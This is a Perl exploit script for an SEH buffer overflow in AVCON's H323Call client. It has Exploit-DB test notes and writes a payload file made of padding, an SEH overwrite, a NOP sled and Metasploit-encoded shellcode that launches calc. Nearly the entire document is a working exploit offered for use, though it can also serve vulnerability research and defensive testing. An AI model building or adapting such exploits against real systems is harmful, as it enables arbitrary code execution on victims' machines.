#!/usr/bin/perl
# Exploit Title: AVCON H323Call Buffer Overflow
# Date: 5/9/10
# Author: Dillon Beresford
# URL: http://www.avcon.com.cn/
# Versions: 4.6.8.7 | 4.6.4.0
# Tested on: XP SP2 and SP3
# CVE : NONE
# Code : exploit.pl
# Twitter: http://twitter.com/D1N
# Download: http://meeting.bjhr.gov.cn/avcon/avcon.exe
# Download: http://meeting.cei.gov.cn/avcon/avcon.exe
my $exploit = "poc.txt";
## EDB Test Notes:
## Software can be installed as English. Once installed, go to "Start" -> "AVCON4" -> select H323 Call
## or just run "H323Call.exe" located inside installation folder,
## copy and paste the exploit (string) to the input field (there's only one),
## and click on "call". (this is a different flaw in the software package affects H323Call).
my $junk = "\x41" x 1019;
my $nSEH = "\xeb\x08\x90\x90";
my $SEH = pack('V',0x1005FE29);
my $nops = "\x90" x 25;
# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
my $buf =
"\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4" .
"\xd2\xe5\x7b\x83\xeb\xfc\xe2\xf4\x38\x3a\x6c\x7b\xc4\xd2" .
"\x85\xf2\x21\xe3\x37\x1f\x4f\x80\xd5\xf0\x96\xde\x6e\x29" .
"\xd0\x59\x97\x53\xcb\x65\xaf\x5d\xf5\x2d\xd4\xbb\x68\xee" .
"\x84\x07\xc6\xfe\xc5\xba\x0b\xdf\xe4\xbc\x26\x22\xb7\x2c" .
"\x4f\x80\xf5\xf0\x86\xee\xe4\xab\x4f\x92\x9d\xfe\x04\xa6" .
"\xaf\x7a\x14\x82\x6e\x33\xdc\x59\xbd\x5b\xc5\x01\x06\x47" .
"\x8d\x59\xd1\xf0\xc5\x04\xd4\x84\xf5\x12\x49\xba\x0b\xdf" .
"\xe4\xbc\xfc\x32\x90\x8f\xc7\xaf\x1d\x40\xb9\xf6\x90\x99" .
"\x9c\x59\xbd\x5f\xc5\x01\x83\xf0\xc8\x99\x6e\x23\xd8\xd3" .
"\x36\xf0\xc0\x59\xe4\xab\x4d\x96\xc1\x5f\x9f\x89\x84\x22" .
"\x9e\x83\x1a\x9b\x9c\x8d\xbf\xf0\xd6\x39\x63\x26\xae\xd3" .
"\x68\xfe\x7d\xd2\xe5\x7b\x94\xba\xd4\xf0\xab\x55\x1a\xae" .
"\x7f\x2c\xeb\x49\x2e\xba\x43\xee\x79\x4f\x1a\xae\xf8\xd4" .
"\x99\x71\x44\x29\x05\x0e\xc1\x69\xa2\x68\xb6\xbd\x8f\x7b" .
"\x97\x2d\x30\x18\xa5\xbe\x86\x7b";
my $padding = "E" x 5000;
my $payload = $junk.$nSEH.$SEH.$nops.$buf.$padding;
open (myfile,">$exploit");
print myfile $payload;
close (myfile);